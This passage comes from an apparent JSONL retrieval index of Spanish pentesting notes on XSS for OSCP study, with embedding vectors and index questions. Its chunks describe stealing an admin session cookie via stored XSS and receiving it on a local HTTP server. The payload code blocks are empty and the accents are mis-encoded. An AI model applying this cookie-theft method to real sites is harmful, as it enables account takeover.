-0.03715, -0.04759, 0.02888, 0.00982, 0.09032, 0.03418, -0.06539, -0.10327, 0.07527, -0.11368, 0.06835, 0.00584, 0.03785, 0.05755, -0.01787, 0.10735, -0.0279, 0.0031, -0.06904, 0.01627, -0.06915, 0.01158, 0.12298, -0.013, -0.02443, 0.0481, -0.05042, -0.06052, 0.06612, -0.0018, 0.05569, 0.00177, 0.01335, -0.07054, -0.05492, -0.03085, -0.03068, 0.0305, -0.00935, 0.0231, -0.01214, 0.02417, 0.01325, -0.03888, -0.03019, -0.01338, -0.04213, -0.00849, -0.02719, -0.00877, 0.01569, 0.05385, 0.06355, -0.02965, -0.00831, 0.0075, 0.05929, -0.04797, -0.03356, 0.04855, -0.00409, -0.07353, -0.01014, 0.01344, -0.01468, -0.01229, 0.01039, -0.01311, 0.02299, 0.0377, 0.04139, -0.02816, -0.01254, 0.02659, -0.06635, 0.03587, -0.0189, -0.05146, -0.00757, 0.02071, 0.02498, 0.04214, -0.01441, -0.0022, -0.02035, 0.0414, 0.06605, -0.01129, -0.03739, 0.01678, 0.0188, 0.03683, -0.02085, 0.06332, -0.02695, -0.06785, -0.0067, 0.00964, 0.03527, -0.05121, -0.00738, -0.04146, 0.01319, -0.00536, -0.02028, 0.03451, -0.03623, 0.01827, -0.0674, 0.00377, 0.02552, -0.02852, -0.06134, -0.08656, -0.00672, -0.04426, 0.02626, 0.00994, -0.01315, 0.04668, -0.0325, -0.04534, -0.02724, 0.0083, -0.00928]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# XSS (Cross-Site Scripting)\n\n> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesiΓ³n de un admin). Vector de Hacking web.", "indexar": "como puedo ejecutar scripts en el navegador de otro usuario sin usar SQLi ni RCE", "v": [-0.02256, -0.09785, -0.19353, -0.14769, 0.00134, -0.23436, -0.08943, -0.1556, 0.09799, -0.02317, -0.14904, -0.11998, -0.00186, -0.16633, -0.01125, 0.01207, 0.03731, 0.01381, -0.03874, 0.01861, 0.08044, -0.11672, 0.07949, 0.06295, -0.02731, 0.04123, 0.02177, 0.02278, -0.01441, -0.11058, -0.08092, 0.05502, 0.08221, -0.06425, -0.00654, -0.01852, 0.00452, -0.04454, -0.02415, 0.04275, 0.03102, -0.00818, -0.23385, 0.12949, -0.00156, 0.03536, 0.0735, -0.05613, 0.03864, -0.0892, 0.0667, -0.04245, -0.27599, -0.00255, -0.0071, 0.04271, 0.1174, -0.10253, 0.01115, 0.00841, -0.02474, -0.0077, 0.08541, 0.02675, 0.0024, 0.00909, 0.06085, -0.07537, -0.04732, 0.08161, -0.02529, 0.08014, -0.09652, -0.02831, 0.13641, 0.00175, -0.0249, -0.02499, 0.08299, 0.04357, -0.09072, -0.02694, -0.08288, 0.0009, -0.04668, -0.06746, 0.03591, -0.06458, 0.01918, -0.01665, 0.10895, 0.02108, -0.01715, -0.03383, 0.04191, -0.1074, 0.09231, -0.06947, 0.03824, 0.00754, -0.00105, -0.02841, 0.01285, 0.15121, 0.04476, 0.0294, 0.11395, -0.04535, 0.02129, -0.06184, 0.04313, -0.01171, -0.10254, -0.05008, 0.01021, 0.07254, 0.00056, -0.07543, -0.06963, -0.07305, -0.06286, -0.01526, -0.08631, -0.04616, 0.02773, -0.02817, 0.03654, 0.03204, -0.05664, -0.03596, -0.09195, -0.06372, -0.03713, -0.02902, -0.08487, 0.11334, 0.01011, -0.06711, -0.04165, -0.04473, 0.06207, 0.00575, -0.01819, 0.05439, 0.10311, -0.04834, -0.02398, -0.03794, -0.08597, -0.07283, 0.1093, -0.06051, -0.02661, 0.01828, -0.02332, -0.05709, 0.01637, 0.01549, -0.01945, 0.06505, 0.00473, 0.00067, -0.02688, 0.04977, 0.02581, -0.06044, -0.03696, -0.04401, 0.07005, 0.08848, 0.0656, 0.05467, 0.07203, -0.09815, 0.03427, -0.05361, -0.02374, -0.0305, -0.01384, -0.02796, 0.01732, -0.03433, -0.02561, 0.02076, -0.0406, -0.05356, -0.0193, -0.00163, -0.05535, 0.03371, -0.00855, 0.08271, 0.00538, -0.06533, 0.05285, -0.01518, -0.02667, -0.03593, -0.00696, -0.06201, -0.01554, 0.00527, -0.01454, -0.03484, 0.04048, 0.00782, -0.0379, 0.03844, -0.0125, -0.02197, 0.00526, -0.01667, 0.02881, -0.00208, 0.00413, -0.05585, 0.04096, 0.03846, 0.01459, -0.04057, -0.04462, 0.02578, 0.03356, -0.05191, 0.03192, -0.00741, 0.0311, -0.04527, -0.03368, 0.02765, 0.01872, -0.00624, -0.04652, -0.00814, 0.02842, -0.02658, -0.00721, -0.03178, -0.01628, -0.04532, 0.00346, 0.06485, 0.01461, -0.03107, 0.00678, -0.00206, -0.0861, 0.00449, 0.00483, -0.03388, -0.02185, -0.00419, 0.03649, -0.05121, -0.04449, 0.0345]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# XSS (Cross-Site Scripting)\n\n> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesiΓ³n de un admin). Vector de Hacking web.", "indexar": "cual es la mejor estrategia de hacking web para XSS", "v": [0.02243, -0.07211, -0.0108, -0.03834, -0.04361, -0.19894, -0.12565, -0.08231, 0.07367, 0.09487, -0.0466, -0.02811, -0.07922, -0.06095, 0.08495, 0.0284, 0.07885, 0.00455, 0.0374, -0.01832, 0.00103, 0.05303, -0.12231, -0.06582, -0.01455, -0.09406, -0.01943, 0.08434, -0.20764, -0.02311, -0.02449, -0.05042, -0.06445, 0.04603, -0.0716, 0.08632, -0.0145, 0.16616, 0.13271, 0.09726, -0.02585, 0.04083, -0.16183, -0.02598, 0.11079, 0.00545, -0.07304, -0.08457, 0.03183, -0.02564, 0.03788, 0.01816, -0.17774, -0.02885, 0.07306, -0.02747, 0.05843, -0.13792, -0.04307, -0.13125, -0.04651, 0.00431, 0.04588, -0.06828, -0.07402, -0.09682, -0.06019, -0.00396, -0.06937, 0.02953, 0.09178, 0.00238, 0.05511, -0.00501, 0.04446, 0.03376, 0.17633, 0.04487, -0.02135, 0.05511, 0.04549, -0.08788, -0.10704, 0.08284, -0.15435, -0.00666, -0.05438, -0.08544, 0.0013, -0.05586, 0.06916, 0.01925, -0.07665, -0.04197, 0.01796, -0.15326, 0.10698, -0.06232, 0.04398, -0.02752, 0.00383, -0.08309, -0.13826, 0.07059, -0.01497, 0.03219, -0.03214, 0.05176, -0.06421, -0.08961, -0.00809, -0.06114, -0.07107, 0.01942, -0.00202, -0.05781, 0.012, 0.04341, 0.00348, -0.04015, -0.12927, 0.03266, -0.02191, 0.04971, 0.07026, 0.00051, -0.02606, 0.01637, -0.03812, -0.10005, 0.05122, -0.04074, -0.01627, 0.07642, -0.05007, 0.03171, 0.0063, -0.0849, -0.09892, -6e-05, -0.03518, 0.03696, -0.03358, 0.03481, 0.01174, 0.06518, 0.12236, 0.03799, -0.02827, -0.02626, -0.00157, 0.00746, 0.01378, -0.02357, -0.12253, 0.01819, -0.0925, -0.03553, -0.01937, 0.09118, -0.00235, -0.02257, 0.02791, 0.03067, -0.00722, 0.0123, 0.0, 0.02889, 0.00166, 0.01545, 0.00985, 0.07137, 0.0144, -0.10453, -0.00013, -0.03611, -0.07173, -0.0503, 0.05227, -0.0143, 0.00409, -0.02217, 0.06166, 0.05196, -0.01933, -0.08475, 0.05719, 0.03507, 0.01801, -0.01353, -0.06075, -0.11067, -0.05756, 0.08684, 0.05595, -0.11609, 0.00422, 0.01362, 0.05849, -0.05373, -0.04174, -0.00794, 0.06245, -0.03525, -0.0186, -0.00196, 0.0207, -0.13441, -0.06553, 0.03196, 0.03405, -0.04445, -0.03745, -0.04516, -0.06479, -0.01838, 0.02414, -0.01936, -0.04147, 0.02921, -0.03167, 0.01354, 0.00185, -0.04127, -0.03382, 0.04165, 0.01642, -0.00361, -0.02351, -0.04848, -0.02732, -0.01863, -0.04341, 0.0052, 0.00982, 0.00861, -0.02176, -0.02661, -0.03776, -0.0502, 0.00429, 0.00637, 0.00455, -0.09059, -0.01453, -0.06631, -0.0753, 0.00493, -0.00239, -0.02713, 0.00955, 0.0088, -0.01203, 0.03066, 0.00926, 0.06427]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Tipos\n```\nReflected β†’ tu payload vuelve en la respuesta de ESA peticiΓ³n (?q=\n\">\n```\nPrueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).", "indexar": "que programa sirva para detectar payloads XSS", "v": [0.06548, -0.11746, -0.14452, -0.11529, 0.01776, -0.13027, -0.0042, -0.12302, -0.0041, 0.10156, -0.00646, 0.03057, -0.02226, -0.07448, -0.01362, 0.03923, -0.07761, -0.01565, 0.02563, -0.00399, 0.05638, 0.01626, -0.0574, -0.10393, 0.03511, 0.13372, -0.05603, -0.06695, -0.09151, -0.01319, -0.00915, -0.01708, 0.07033, -0.01626, -0.04228, 0.01225, -0.08332, 0.06125, 0.04722, 0.08067, 0.10887, 0.10816, -0.05515, 0.02523, 0.15972, 0.0009, -0.00831, 0.03048, -0.00331, -0.12296, 0.08547, 0.09683, -0.07992, 0.01935, -0.00097, -0.13976, 0.04647, -0.11873, -0.01982, -0.02302, 0.01846, 0.12686, 0.03982, -0.06048, -0.02975, -0.08764, 0.08615, -0.0019, -0.04815, -0.11318, -0.00396, -0.06723, 0.04386, 0.05273, 0.03669, -0.03222, 0.05911, 0.00178, 0.11495, 0.07721, 0.01044, -0.02511, -0.00355, 0.09383, -0.05264, 0.00712, -0.00535, -0.02363, 0.03119, -0.16103, 0.034, 0.07358, -0.01163, 0.12572, 0.08739, -0.04829, 0.18387, -0.02029, 0.05306, 0.06647, 0.0655, -0.03944, 0.02073, 0.02198, -0.01898, 0.05139, 0.05134, -0.0193, -0.01977, -0.05195, 0.10856, -0.0987, 0.0339, -0.03017, -0.10244, -0.06991, 0.03956, 0.0899, 0.00914, -0.02827, -0.09484, 0.06065, -0.01424, 0.02748, 0.12378, -0.16209, -0.02145, 0.12624, 0.05174, 0.06916, 0.04219, 0.0497, 0.03558, -0.00832, -0.10066, -0.05047, 0.06614, 0.02297, -0.08341, -0.00317, 0.03357, 0.08012, 0.0915, 0.07452, 0.01481, 0.08325, -0.02288, 0.05333, -0.02472, -0.00211, 0.01928, 0.01857, -0.02491, 0.01223, -0.06864, -0.08564, 0.103, 0.08953, -0.00697, -0.01173, -0.0816, 0.01713, -0.01321, -0.02965, 0.09217, -0.02587, 0.06305, 0.00836, 0.04345, 0.12942, -0.02321, 0.02701, 0.03674, -0.0655, -0.00302, -0.03413, -0.03496, -0.0987, 0.12428, 0.00196, -0.12804, 0.0588, 0.07991, 0.02926, -0.01707, -0.07688, -0.02572, 0.03765, 0.05882, -0.00592, 0.02369, -0.00774, -0.00639, -0.03898, 0.02703, -0.06278, 0.00177, 0.00523, 0.04467, -0.0452, 0.00504, -0.02495, 0.02452, -0.03221, -0.00529, 0.00347, -0.05215, -0.02608, 0.04946, 0.04268, 0.06064, -0.04172, 0.07403, -0.01444, -0.06179, -0.02058, -0.04283, 0.02872, 0.00193, 0.09319, -0.08004, -0.00946, 0.06244, -0.01251, -0.03149, -0.02342, 0.04488, 0.0119, 0.12649, -0.02637, 0.01052, -0.02062, -0.03128, 0.03359, 0.04396, 0.01707, -0.04304, -0.01513, -0.01616, -0.0454, 0.04728, 0.04903, -0.04055, -0.11215, -0.00237, 0.01175, -0.01767, 0.03677, 0.04058, 0.03475, 0.00695, 0.09317, 0.02825, -0.02372, 0.04365, 0.0593]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n y payloads\n```html\n\n\n\">\n```\nPrueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).", "indexar": "con que puedo probar si una etiqueta renderiza contenido malicioso", "v": [-0.24948, -0.01936, -0.11982, -0.20854, 0.09496, -0.01233, -0.10339, 0.09575, -0.05779, -0.2076, -0.13324, -0.09543, 0.08791, -0.08809, -0.03633, 0.12149, 0.00361, 0.05832, 0.07141, -0.07174, 0.0569, -0.13431, -0.18246, -0.17756, 0.06801, -0.01008, 0.02494, 0.10632, -0.043, -0.05051, -0.09563, 0.00724, 0.0945, -0.01244, -0.18363, -0.03055, 0.06588, -0.03236, 0.02545, 0.05101, 0.03191, 0.01616, -0.07461, 0.02141, -0.07047, 0.10312, -0.03749, 0.09478, -0.10728, -0.02564, 0.07447, -0.04988, -0.04605, 0.07287, 0.01791, -0.00956, 0.07078, -0.10492, 0.13192, -0.02919, 0.04882, -0.02524, 0.02957, 0.02225, -0.05142, -0.0293, -0.04982, 0.18388, -0.07303, 0.02188, 0.01633, 0.01427, 0.00185, -0.06087, -0.0691, 0.05707, -0.06337, -0.03119, -0.00087, 0.08203, 0.02277, -0.02964, -0.09563, 0.01096, -0.01615, -0.11894, -0.09872, -0.08744, 0.11301, -0.08653, 0.05587, -0.00509, -0.01717, 0.02267, -0.02141, 0.02432, 0.11052, -0.05449, 0.00578, -0.08985, 0.04548, -0.0483, -0.09829, -0.02156, 0.04804, 0.07194, 0.09912, -0.09049, 0.02184, -0.07104, -0.02228, -0.02182, -0.12298, 0.01932, -0.0447, -0.05149, -0.06063, -0.04102, 0.03468, -0.02394, 0.0193, -0.00094, -0.04039, -0.01281, 0.03845, 0.01616, 0.01207, -0.02632, -0.04995, 0.00037, -0.05225, 0.10517, -0.01475, -0.0812, -0.07168, -0.0784, 0.05458, -0.03961, 0.04908, 0.00176, -0.01149, -0.00098, 0.06439, 0.00575, 0.02059, 0.01019, 0.00169, -0.05444, -0.1048, 0.05315, -0.00822, 0.06443, 0.02866, 0.01447, -0.11214, 0.01747, 0.00925, 0.01123, 0.09696, 0.02543, -0.00865, 0.0656, -0.05224, 0.00714, -0.03048, -0.0013, -0.00876, -0.03938, 0.04882, -0.01799, -0.01336, 0.05884, -0.01935, -0.04665, 0.06682, -0.01326, -0.04957, -0.0208, -0.04766, -0.04859, 0.02876, -0.05426, 0.0431, -0.01797, -0.01908, -0.04257, 0.02998, 0.06846, -0.02605, 0.03792, 0.03256, 0.0628, -0.01496, 0.0296, 0.02201, -0.04916, 0.01407, -0.00736, -0.00958, -0.00437, 0.0338, -0.03699, 0.00536, -0.01507, -0.06932, -0.00662, -0.02329, 0.03976, -0.02269, -0.00027, 0.0214, 0.03746, 0.06101, -0.04347, -0.0002, 0.08114, 0.02433, 0.02017, -0.04671, 0.06127, 0.00957, 0.03707, 0.05883, -0.00456, 0.0451, 0.00432, -0.01348, 0.02617, -0.01047, 0.0104, -0.00785, 0.04214, -0.03218, -0.00473, -0.00672, 0.00696, 0.00848, -0.05814, -0.05259, -0.04899, -0.02053, 0.04517, 0.0382, -0.0158, 0.02203, -0.0159, -0.02501, -0.08023, -0.0702, -0.05703, 0.06284, 0.03044, 0.01827, 0.00602, 0.01336, -0.0184]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DetecciΓ³n y payloads\n```html\n\n\n\">\n```\nPrueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).", "indexar": "cuales herramientas me ayudan a identificar scripts inofensivos para pruebas", "v": [0.05539, 0.09511, -0.14886, -0.16031, 0.03435, -0.16545, -0.09625, -0.05156, 0.0091, -0.06266, -0.08873, -0.00997, 0.00789, -0.144, 0.04986, 0.0599, 0.0522, -0.09137, 0.03532, -0.03524, -0.02729, -0.02978, -0.12824, 0.02486, -0.12071, 0.0062, -0.00625, -0.01343, -0.16275, 0.02914, -0.02183, 0.05319, 0.00843, 0.00917, -0.19864, -0.00215, -0.12591, 0.06948, 0.06029, 0.27, -0.01983, -0.04915, -0.01722, 0.0046, 0.05047, -0.08742, -0.10388, 0.04036, -0.06065, -0.02293, 0.00135, -0.12935, -0.04405, -0.06342, -0.08921, -0.14186, 0.03128, -0.1065, -0.03362, -0.00204, -0.14409, -0.11017, -0.0377, 0.02577, 0.11091, 0.03972, -0.00446, -0.13701, -0.09283, 0.03865, 0.02807, 0.05624, -0.00305, -0.00129, -0.07303, 0.00894, -0.02092, -0.0417, 0.05563, -0.07148, 0.01971, 0.00965, 0.00769, 0.02031, -0.02906, -0.10568, -0.14268, 0.02727, 0.00814, -0.11579, 0.04144, 0.04311, 0.0356, 0.01767, 0.06262, 0.07213, 0.05463, -0.03959, 0.09522, 0.0106, -0.0086, -0.11539, 0.01433, 0.03124, -0.03562, 0.04668, 0.01205, 0.04482, -0.07439, -0.04859, 0.06365, 0.07774, -0.0209, 0.05735, 0.00944, 0.04365, 0.04785, -0.0729, 0.02374, -0.09692, 0.01992, 0.04601, -0.10551, 0.00918, 0.00275, -0.0511, 0.0447, -0.03863, 0.05863, 0.02859, -0.02015, -0.01257, -0.11613, -0.04686, -0.03685, 0.03819, 0.08205, -0.05541, -0.09246, -0.06212, 0.04165, -0.01351, 0.06127, -0.01311, 0.05391, -0.01016, -0.05573, -0.02695, -0.02634, -0.03286, -0.01588, -0.00625, -0.0215, 0.04759, -0.06014, -0.12061, 0.07762, 0.08835, -0.08266, -0.01014, -0.02699, -0.07532, -0.02373, 0.02146, 0.04985, -0.00624, 0.02409, 0.05654, 0.01545, 0.05152, 0.07866, -0.01538, 0.06405, -0.01386, 0.0501, -0.02215, -0.00745, -0.07169, -0.13255, -0.04789, 0.05275, -0.00402, 0.02781, -0.00441, 0.06198, -0.07252, 0.06318, -0.0563, 0.07623, 0.069, -0.00611, 0.02889, -0.04121, -0.04547, 0.00898, 0.06893, 0.00738, -0.01566, -0.01744, -0.04713, -0.02969, -0.01106, -0.03026, -0.05114, 0.05506, 0.04811, -0.08274, -0.03138, -0.02021, -0.04824, 0.03114, 0.03235, 0.05127, -0.07889, -0.06088, 0.03537, -0.01799, 0.0278, -0.04252, -0.03091, 0.02597, -0.01695, 0.04802, -0.00941, -0.06319, 0.05464, 0.01502, 0.01945, 0.00127, -0.00188, 0.04356, -0.08024, -0.03873, 0.0251, 0.04408, -0.10644, -0.01463, -0.00496, 0.01487, -0.0387, -0.0538, 0.03867, 0.00722, -0.04157, -0.0228, -0.01663, -0.00244, -0.05838, -0.02791, 0.03479, -0.04191, -0.00918, 0.05377, -0.02589, 0.04956, -0.02344]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© sirve en OSCP\n- **Robar la cookie de sesiΓ³n** de un admin (XSS stored en un panel que el admin revisa):\n```html\n\n```\n La recibes en tu `python3 -m http.server` β†’ la usas en Authentication attacks.\n- A veces el panel admin tiene una funciΓ³n que escala a RCE / File upload bypass.\n\nRelacionado: SSTI Β· Authentication attacks Β· OSCP MOC", "indexar": "cual es un metodo de ataque para robar cookies de sesion en un panel administracion?", "v": [0.0193, -0.08301, 0.00062, -0.09922, -0.1286, -0.14358, 0.09414, 0.14753, -0.10201, 0.01734, -0.12021, -0.11583, 0.09314, 0.04855, 0.03942, -0.09186, 0.10305, 0.11984, 0.08196, -0.02581, -0.0034, -0.01744, -0.01873, 0.06826, 0.07249, 0.0772, 0.01005, 0.03049, -0.07278, 0.00049, -0.01, -0.09638, 0.11363, -0.03206, -0.1239, -0.02046, 0.04273, -0.00375, -0.00458, 0.11812, -0.07656, -0.11843, -0.11203, -0.05351, 0.0672, -0.07542, 0.00068, 0.02547, 0.134, 0.06591, 0.12276, 0.00298, -0.11312, 0.00892, -0.02109, -0.0022, -0.00987, -0.08103, 0.0343, -0.03181, -0.07012, 0.05896, -0.07871, -0.02104, 0.10494, -0.06839, -0.04353, 0.00442, 0.03775, 0.06301, 0.09216, -0.00585, -0.00351, 0.02736, 0.04828, 0.0069, 0.01556, 0.16147, 0.05263, -0.04964, -0.05557, 0.0056, -0.14849, 0.0631, -0.19582, 0.02873, 0.07998, -0.1019, -0.07775, -0.0396, -0.01499, 0.01819, -0.12171, -0.05466, -0.07538, -0.0922, 0.06095, -0.06872, -0.01244, 0.04145, 0.1194, -0.03253, -0.14371, 0.15751, 0.04885, 0.01132, -0.09156, -0.03377, 0.04051, -0.15172, -0.08768, -0.02323, -0.04972, -0.00606, 0.07111, 0.06922, -0.07398, 0.0677, -0.14709, -0.08086, -0.0626, -0.01087, -0.11717, 0.01722, -0.0057, -0.05269, 0.06023, 0.06287, -0.13311, -0.0545, -0.01279, 0.03791, 0.05799, 0.12199, 0.00442, 0.05844, 0.02215, -0.06796, -0.07207, 0.00702, 0.00602, 0.05622, 0.03535, 0.00446, 0.00696, -0.00295, -0.01066, 0.03039, -0.02619, -0.05942, -0.05155, 0.00713, 0.00861, 0.02163, 0.02303, -0.00944, 0.05266, -0.06302, -0.06857, 0.11692, -0.04423, 0.02934, -0.04128, 0.03285, 0.00271, -0.1091, -0.00947, -0.05152, 0.07498, -0.02475, 0.02106, -0.00443, 0.01881, 0.01801, 0.01449, -0.01175, -0.01974, -0.06984, 0.00743, -0.01261, -0.02292, -0.00789, 0.00727, 0.01561, 0.0207, -0.00837, 0.04759, 0.07529, -0.03484, 0.07809, 0.06034, 0.01243, -0.0364, 0.04047, -0.00228, -0.02106, 0.00419, 0.04713, 0.03957, 0.05611, 0.03687, -0.00801, 0.02011, 0.00871, -0.00312, 0.07677, -0.02652, -0.06414, -0.03333, 0.03121, 0.07638, 0.04048, 0.05371, -0.03902, -0.00862, -0.01235, -0.05412, 0.00444, -0.01294, -0.0154, 0.04145, 0.02081, 0.00899, 0.05273, -0.05068, 0.02997, -0.08283, 0.01178, -0.03967, -0.01227, -0.06387, -0.01567, 0.02565, 0.01137, 0.01635, -0.02519, 0.05007, -0.03257, -0.04567, -0.06346, -0.01995, 0.0321, -0.03347, -0.01327, -0.02593, 0.00476, -0.05433, 0.03301, 0.02031, -0.06289, 0.03891, -0.01378, -0.03992, 0.02202, 0.02698, -0.03697]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© sirve en OSCP\n- **Robar la cookie de sesiΓ³n** de un admin (XSS stored en un panel que el admin revisa):\n```html\n\n```\n La recibes en tu `python3 -m http.server` β†’ la usas en Authentication attacks.\n- A veces el panel admin tiene una funciΓ³n que escala a RCE / File upload bypass.\n\nRelacionado: SSTI Β· Authentication attacks Β· OSCP MOC", "indexar": "como puedo realizar un ataque de autentificacion para acceder a funciones que escalan a RCE?", "v": [-0.075, 0.12002, -0.27356, -0.12983, 0.08602, -0.02086, -0.02675, 0.04827, -0.11925, 0.07535, -0.08345, -0.08111, -0.06709, -0.01254, 0.15471, 0.00468, -0.03196, 0.03589, -0.05317, 0.05936, 0.00116, -0.03014, 0.03101, 0.09276, 0.01057, 0.09665, 0.00749, -0.02656, 0.04536, -0.1298, 0.14833, -0.03491, 0.02871, 0.00347, 0.11963, -0.01663, -0.07031, 0.01759, 0.06155, 0.02927, -0.0897, -0.02279, -0.19403, 0.05617, 0.06129, 0.03053, 0.04123, 0.0866, 0.10148, 0.00154, 0.01954, -0.0583, -0.13051, -0.08574, 0.00835, -0.01144, 0.16054, -0.07627, 0.0691, -0.02123, -0.02805, 0.10755, 0.01841, -0.07043, -0.02045, 0.00865, 0.03937, 0.00069, -0.02296, 0.03733, -0.07635, 0.00413, -0.01135, -0.00654, 0.05502, -0.04496, -0.02564, 0.01736, 0.06631, 0.00304, 0.00305, 0.04931, -0.16058, 0.02681, -0.02435, -0.01608, 0.04168, -0.11344, 0.0428, -0.0094, 0.09218, -0.0169, -0.02717, 0.01066, -0.02909, -0.01129, -0.04263, -0.08684, 0.00908, -0.05561, 0.02465, -0.07315, -0.07183, 0.18851, -0.05175, -0.02998, 0.00601, -0.06344, 0.04029, -0.12718, -0.0162, 0.01206, -0.15373, -0.00859, -0.06454, 0.03152, -0.12719, -0.06817, 0.00046, -0.05019, -0.10001, -0.06588, 0.08151, -0.00147, 0.00937, 0.04245, 0.03054, 0.02449, -0.03436, -0.00599, -0.03363, 0.06433, 0.00498, 0.01389, 0.02585, 0.04897, 0.01545, -0.11463, 0.01036, -0.00642, 0.06733, 0.0842, 0.06258, -0.05899, 0.07689, 0.01939, 0.01197, -0.1024, -0.10672, 0.04717, 0.01701, 0.04204, -0.07405, 0.15037, 0.00595, -0.04959, 0.00303, -0.07025, -0.02879, 0.0829, -0.04352, -0.01027, -0.06972, 0.01051, -0.03095, -0.04311, 0.00192, -0.09119, 0.10616, 0.02868, -0.02255, 0.0842, 0.01491, -0.09967, -0.02647, 0.03165, 0.00606, -0.04654, 0.08288, 0.02185, -0.01881, -0.0575, -0.02906, 0.00256, 0.02522, -0.04158, -0.01253, -0.05512, -0.04541, 0.0903, -0.00856, 0.04159, -0.03229, 0.0354, -0.00434, -0.0669, -0.11042, -0.00733, -0.00935, -0.02152, 0.03407, -0.07611, -0.05813, -0.02133, 0.04607, 0.05415, -0.04461, 0.02944, -0.03095, 0.04847, 0.04829, -0.00393, 0.10319, -0.04906, -0.01525, -0.01341, 0.05125, -0.00845, 0.01126, 0.00614, -0.01422, 0.01125, 0.07497, 0.02256, 0.01145, -0.03863, 0.02806, -0.03134, 0.01743, 0.00215, -0.01769, 0.00209, 0.05139, -0.03002, 0.04824, -0.03076, 0.07019, -0.03915, -0.06864, -0.04554, 0.0085, 0.03441, 0.02633, 0.0335, -0.03795, -0.06933, -0.077, 0.05783, 0.01912, -0.09073, -0.02557, 0.03645, 0.0137, 0.00315, 0.05089, -0.03114]} +{"tipo": "pregunta", "herramienta": "XSS", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/XSS.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© sirve en OSCP\n- **Robar la cookie de sesiΓ³n** de un admin (XSS stored en un panel que el admin revisa):\n```html\n\n```\n La recibes en tu `python3 -m http.server` β†’ la usas en Authentication attacks.\n- A veces el panel admin tiene una funciΓ³n que escala a RCE / File upload bypass.\n\nRelacionado: SSTI Β· Authentication attacks Β· OSCP MOC", "indexar": "que tecnica sirve para extraer la cookie de sesion desde una imagen incrustada en HTML?", "v": [-0.04376, -0.14593, -0.05156, -0.06452, 0.03467, -0.32947, -0.07228, 0.10424, 0.12869, -0.02995, -0.13949, -0.05809, -0.00985, -0.04436, 0.02358, -0.12835, 0.16058, -0.06964, 0.18992, -0.05202, 0.01173, 0.05103, -0.08408, 0.03716, -0.02553, -0.10631, -0.09396, 0.06873, -0.15129, -0.09895, 0.09172, -0.02238, -0.02186, 0.05757, -0.08162, -0.00251, 0.01417, -0.06572, -0.03684, 0.06419, -0.05166, -0.01025, 0.01445, -0.03823, -0.07293, -0.01344, 0.03447, 0.02463, 0.0128, 0.00955, 0.1004, 0.02151, -0.09893, 0.011, -0.1166, 0.04543, 0.12761, -0.11182, -0.03705, 0.01051, 0.05005, 0.017, 0.01896, 0.01426, 0.00858, 0.01821, 0.00971, -0.01312, 0.01459, -0.00601, -0.0209, 0.03047, 0.07981, -0.08132, 0.04952, 0.01333, -0.03265, 0.04527, 0.05772, -0.08445, 0.02063, -0.00268, -0.09164, -0.03137, -0.07755, 0.00726, -0.04512, -0.07354, 0.03664, -0.08601, 0.09593, 0.10613, 0.01027, -0.06889, -0.03434, -0.04107, 0.02566, 0.0045, 0.13393, 0.0025, 0.05593, -0.04395, -0.09592, 0.05984, 0.10702, 0.0007, 0.1116, -0.1089, -0.00893, -0.01328, -0.03644, -0.05458, -0.09981, -0.04591, -0.06016, 0.08819, -0.01322, 0.01183, -0.10622, -0.03182, 0.02564, -0.06, -0.04899, 0.07713, -0.06172, -0.01397, -0.05826, 0.02621, -0.11303, -0.11982, -0.1166, 0.08798, -0.04194, 0.08912, -0.005, 0.04602, 0.11308, -0.08132, -0.02214, -0.02876, -0.01646, 0.02578, -0.0511, 0.01549, -0.05663, 0.00799, 0.04965, 0.00463, -0.03198, -0.06543, 0.03556, 0.00327, 0.06906, 0.02805, -0.02534, 0.01415, 0.00074, -0.00327, -0.01949, 0.03094, -0.0269, -0.06342, 0.02313, 0.03013, 0.03352, -0.01163, -0.15207, -0.10366, 0.0577, 0.04449, 0.00029, -0.04711, -0.02386, -0.01418, 0.05362, 0.07851, -0.04157, -0.01429, -0.05665, 0.018, 0.00598, -0.06704, 0.04416, 0.02167, 0.05299, -0.0424, 0.00429, 0.01838, -0.12561, -0.07403, 0.02004, -0.03942, -0.08103, 0.07069, 0.00031, 0.03655, -0.01876, 0.0392, 0.07777, -0.01627, 0.03647, -0.04281, 0.03269, 0.00313, -0.07526, 0.01031, 0.01061, -0.04083, -0.05691, -0.04092, 0.03151, 0.02481, 0.01933, -0.00243, 0.01964, -0.02065, 0.07611, 0.01967, -0.00685, -0.0215, 0.01042, 0.00404, 0.01658, -0.0079, 0.00479, 0.05861, 0.03601, 0.03547, -0.03286, 0.00471, 0.0573, 0.03953, -0.03973, 0.03397, 0.03824, 0.00864, -0.00337, -0.01788, 